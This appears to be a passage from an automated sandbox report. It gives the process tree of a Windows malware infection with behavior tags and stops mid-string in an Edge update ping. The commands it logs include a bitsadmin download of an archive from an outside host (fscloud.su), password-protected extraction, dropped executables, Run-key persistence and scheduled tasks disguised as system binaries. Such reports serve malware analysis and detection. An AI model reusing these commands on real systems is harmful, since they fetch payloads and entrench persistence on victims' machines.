C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
- Checks for any installed AV software in registry
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z8⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pVs6mDmdY1wodMZO -y x C:\zip.7z -o"C:\Program Files\temp_files\"8⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pKWTDtkOpwTbA5mS -y x C:\zip.7z -o"C:\Program Files\temp_files\"8⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS8⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS9⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT8⤵
-
C:\Users\Admin\Pictures\Adobe Films\XQXdH_5JuxvMmlvSZF2UGNpF.exe"C:\Users\Admin\Pictures\Adobe Films\XQXdH_5JuxvMmlvSZF2UGNpF.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6780841.exe"C:\Users\Admin\AppData\Roaming\6780841.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6035907.exe"C:\Users\Admin\AppData\Roaming\6035907.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1380456.exe"C:\Users\Admin\AppData\Roaming\1380456.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8292732.exe"C:\Users\Admin\AppData\Roaming\8292732.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5077839.exe"C:\Users\Admin\AppData\Roaming\5077839.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\8225910.exe"C:\Users\Admin\AppData\Roaming\8225910.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe"C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ff8e4fcdec0,0x7ff8e4fcded0,0x7ff8e4fcdee05⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6f6df9e70,0x7ff6f6df9e80,0x7ff6f6df9e906⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1888 -ip 18881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2840 -ip 28401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2744 -ip 27441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2912 -ip 29121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3324 -ip 33241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1320 -ip 13201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1656 -ip 16561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3004 -ip 30041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1435.exeC:\Users\Admin\AppData\Local\Temp\1435.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1435.exeC:\Users\Admin\AppData\Local\Temp\1435.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\dot3gpui\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\AppxSignature\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\KBDINBE2\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4964 -ip 49641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\808C.exeC:\Users\Admin\AppData\Local\Temp\808C.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\981C.exeC:\Users\Admin\AppData\Local\Temp\981C.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 2562⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5720 -ip 57201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\ABB5.exeC:\Users\Admin\AppData\Local\Temp\ABB5.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E7C5.exeC:\Users\Admin\AppData\Local\Temp\E7C5.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3964 -s 2962⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\msdxm\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "foldershare" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\QVDBDFUGTJ\foldershare\foldershare.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3964 -ip 39641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\qcap\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Public\Documents\My Pictures\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 13216 -ip 132161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2464 -ip 24641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4288 -ip 42881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4539CBB375BD2D09A0AF7D566BA4C7F0 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C43FEF25E97FB51D2969C81CC3FDC8A72⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2DB9DF9AEE9B82D6FDA8DC8B860651FC E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4120 -ip 41201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6264 -ip 62641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7584 -ip 75841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\CoreUIComponents\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\SIGNUP\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\elevation_service.exe"1⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\msedgerecovery.exe"C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\msedgerecovery.exe" --appguid={56EB18F8-B008-4CBD-B6D2-8C97FE7E9062} --browser-version=92.0.902.62 --sessionid={572948a2-44ef-4729-a1a2-95f61fa8ce9e} --system2⤵
-
C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\MicrosoftEdgeUpdateSetup.exe"C:\Program Files (x86)\Microsoft\Edge\MSEdgeRecovery\scoped_dir8224_967670870\MicrosoftEdgeUpdateSetup.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU7D7A.tmp\MicrosoftEdgeUpdate.exe" /install "runtime=true&needsadmin=true" /installsource chromerecovery /silent4⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc5⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver5⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.151.27\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNTEuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNDMuNTciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDAyMDhFQTgtRTMwQS00NjEwLTg1OUItQzY0NTFGODk3RUMwfSIgdXNlcmlkPSJ7MUM1NUEzOUYtODUwRi00RTk0LUI4N0EtOUU3QTZFMjE1MzYwfSIgaW5zdGFsbHNvdXJjZT0iY2hyb21lcmVjb3ZlcnkiIHJlcXVlc3RpZD0ie0ZGN0FCNjJELUI5RUYtNDMxRS04N0JELTYwMjhCRjY4N0Y5QX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgbG9naWNhbF9jcHVzPSIyIiBwaHlzbWVtb3J5PSI0IiBkaXNrX3R5cGU9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjAiIHNzZTQxPSIwIiBzc2U0Mj0iMCIgYXZ4PSIwIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMjIwMDAuMTAwIiBzcD0iIiBhcmNoPSJ4NjQiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSJEQURZIiBwcm9kdWN0X25hbWU9IlN0YW5kYXJkIFBDIChRMzUgKyBJQ0g5LCAyMDA5KSIvPjxleHAgZXRhZz0iJnF1b3Q7cjQ1MnQxK2syVGdxL0hYemp2Rk5CUmhvcEJXUjlzYmpYeHFlVURIOXVYMD0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMS4zLjE1MS4yNyIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSI3NDciLz48L2FwcD48L3JlcXVlc3Q-5⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /machine /installsource chromerecovery3⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /c2⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource core3⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F7299C4A-FD47-4453-B9F5-B8D9266CC335}\MicrosoftEdgeUpdateSetup_X86_1.3.153.47.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F7299C4A-FD47-4453-B9F5-B8D9266CC335}\MicrosoftEdgeUpdateSetup_X86_1.3.153.47.exe" /update /sessionid "{BF2FF194-866B-4E3D-9496-D3E0DEB07D62}"2⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Temp\EU971D.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU971D.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{BF2FF194-866B-4E3D-9496-D3E0DEB07D62}"3⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc4⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver4⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.153.47\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNTMuNDciIHNoZWxsX3ZlcnNpb249IjEuMy4xNDMuNTciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkYyRkYxOTQtODY2Qi00RTNELTk0OTYtRDNFMERFQjA3RDYyfSIgdXNlcmlkPSJ7MUM1NUEzOUYtODUwRi00RTk0LUI4N0EtOUU3QTZFMjE1MzYwfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7NTZBNjA2QUMtNzNDMi00Njg0LTk1NjktRjg4RDU4M0IyMEYwfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMCIgc3NlNDE9IjAiIHNzZTQyPSIwIiBhdng9IjAiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC4xMDAiIHNwPSIiIGFyY2g9Ing2NCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IkRBRFkiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTUxLjI3IiBuZXh0dmVyc2lvbj0iMS4zLjE1My40NyIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjaHJvbWVyZWMzPTIwMjE0M1IiIGluc3RhbGxhZ2U9Ijc4IiBpbnN0YWxsZGF0ZXRpbWU9IjE2